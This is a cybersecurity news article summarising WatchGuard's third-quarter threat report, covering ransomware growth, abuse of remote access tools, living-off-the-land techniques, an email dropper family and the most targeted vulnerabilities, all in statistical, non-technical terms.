Cybercriminals still prefer targeting open remote access products, or like to leverage legitimate remote access tools to hide their malicious actions, according to WatchGuard.
Medusa ransomware variant surges in Q3. Threat actors increasingly use remote management tools and software to evade anti-malware detection, which both the FBI and CISA have acknowledged.
In researching the top phishing domains, the Threat Lab observed a tech support scam that would result in a victim downloading a pre-configured, unauthorised version of TeamViewer, which would allow an attacker full remote access to their computer.
When factoring in the Medusa detections, ransomware attacks rose 89% quarter over quarter.
Threat actors pivot from using script-based attacks and increasingly employ other living-off-the-land techniques.
Malicious scripts declined as an attack vector by 11% in Q3 after dropping by 41% in Q2. Still, script-based attacks remain the largest attack vector, accounting for 56% of total attacks, and scripting languages like PowerShell are often used in living-off-the-land attacks.
Windows living-off-the-land binaries increased 32%. These findings indicate to Threat Lab researchers that threat actors continue to utilise multiple living-off-the-land techniques, likely in response to more protections around PowerShell and other scripting.
Living-off-the-land attacks make up the most endpoint attacks.
Malware over encrypted channels sees notable decline.
Malware arriving over encrypted connections declined to 48%, meaning just under half of all malware detected came via encrypted traffic.
This figure is notable because it is down considerably from previous quarters.
Overall, total malware detections increased by 14%. An email-based dropper family that delivers malicious payloads comprised four of the Top 5 encrypted malware detections in Q3. All but one of the variants in the Top 5 contained the dropper family named Stacked, which arrives as an attachment in an email spear phishing attempt.
Threat actors will send emails with malicious attachments that appear to come from a known sender and claim to include an invoice or important document for review, aiming to trick end users into downloading malware.
It delivers the adware variant 2345explorer as well as the Vidar password stealer.
Network attacks saw a 16% increase in Q3. ProxyLogon was the number-one vulnerability targeted in network attacks, comprising 10% of all network detections in total.
Three new signatures appeared in the Top 50 network attacks.
These included a PHP Common Gateway Interface Apache vulnerability from 2012 that would result in a buffer overflow.
NET Framework 2.0 vulnerability from 2016 that could result in a denial-of-service attack.
There was also a SQL injection vulnerability in Drupal, the open-source CMS, from 2014.
This vulnerability allowed attackers to remotely exploit Drupal without any need for authentication.
This Cyber News was published on www.helpnetsecurity.com. Publication date: Mon, 11 Dec 2023 05:43:05 +0000